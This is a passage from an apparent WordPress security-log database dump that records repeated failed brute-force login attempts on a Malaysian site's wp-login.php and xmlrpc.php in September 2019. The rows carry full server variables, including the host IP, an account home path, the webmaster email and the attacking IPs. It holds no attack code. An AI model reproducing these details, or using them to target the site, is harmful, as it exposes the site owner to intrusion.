17:07:45',17737680,19228368,'https://bintara.com.my/wp-login.php',1,0,'162.241.182.166'),(23896,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"37998\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5tON7nxogXZmwWoWG4kwAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568566584.8932\";s:12:\"REQUEST_TIME\";s:10:\"1568566584\";}}','notice','2019-09-15 16:56:26','2019-09-15 16:56:25',18255576,19555808,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.78.134'),(23895,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.78.134\";s:11:\"REMOTE_PORT\";s:5:\"37596\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5tNt7nxogXZmwWoWG4kQAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568566582.1496\";s:12:\"REQUEST_TIME\";s:10:\"1568566582\";}}','notice','2019-09-15 16:56:23','2019-09-15 16:56:22',17738976,19228952,'https://bintara.com.my/wp-login.php',1,0,'104.248.78.134'),(23894,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"37018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5nseesTgPVjZVPWmsgZgAAAMI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568565169.5057\";s:12:\"REQUEST_TIME\";s:10:\"1568565169\";}}','notice','2019-09-15 16:32:50','2019-09-15 16:32:49',18255672,19555864,'https://bintara.com.my/xmlrpc.php',1,0,'217.11.48.148'),(23893,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"36424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5nrmCCaIOMm5l5jJEf9AAAAQ0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568565166.7955\";s:12:\"REQUEST_TIME\";s:10:\"1568565166\";}}','notice','2019-09-15 16:32:48','2019-09-15 16:32:47',17903768,19229272,'https://bintara.com.my/wp-login.php',1,0,'217.11.48.148'),(23892,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"217.11.48.148\";s:11:\"REMOTE_PORT\";s:5:\"36424\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5nrmCCaIOMm5l5jJEf9AAAAQ0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568565166.7955\";s:12:\"REQUEST_TIME\";s:10:\"1568565166\";}}','notice','2019-09-15 16:32:48','2019-09-15 16:32:47',17742832,19229272,'https://bintara.com.my/wp-login.php',1,0,'217.11.48.148'),(23891,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"46048\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5iYuoTLkHKFi2qF7FHnQAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568563810.2836\";s:12:\"REQUEST_TIME\";s:10:\"1568563810\";}}','notice','2019-09-15 16:10:11','2019-09-15 16:10:10',18253832,19551504,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.80.77'),(23890,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"45756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5iYOoTLkHKFi2qF7FHnAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568563808.27\";s:12:\"REQUEST_TIME\";s:10:\"1568563808\";}}','notice','2019-09-15 16:10:10','2019-09-15 16:10:08',17905184,19228672,'https://bintara.com.my/wp-login.php',1,0,'128.199.80.77'),(23889,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"45756\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5iYOoTLkHKFi2qF7FHnAAAABU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1568563808.27\";s:12:\"REQUEST_TIME\";s:10:\"1568563808\";}}','notice','2019-09-15 16:10:09','2019-09-15 16:10:08',17742480,19228672,'https://bintara.com.my/wp-login.php',1,0,'128.199.80.77'),(23888,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"42104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5fXeoTLkHKFi2qF7FGJgAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568563038.0236\";s:12:\"REQUEST_TIME\";s:10:\"1568563038\";}}','notice','2019-09-15 15:57:19','2019-09-15 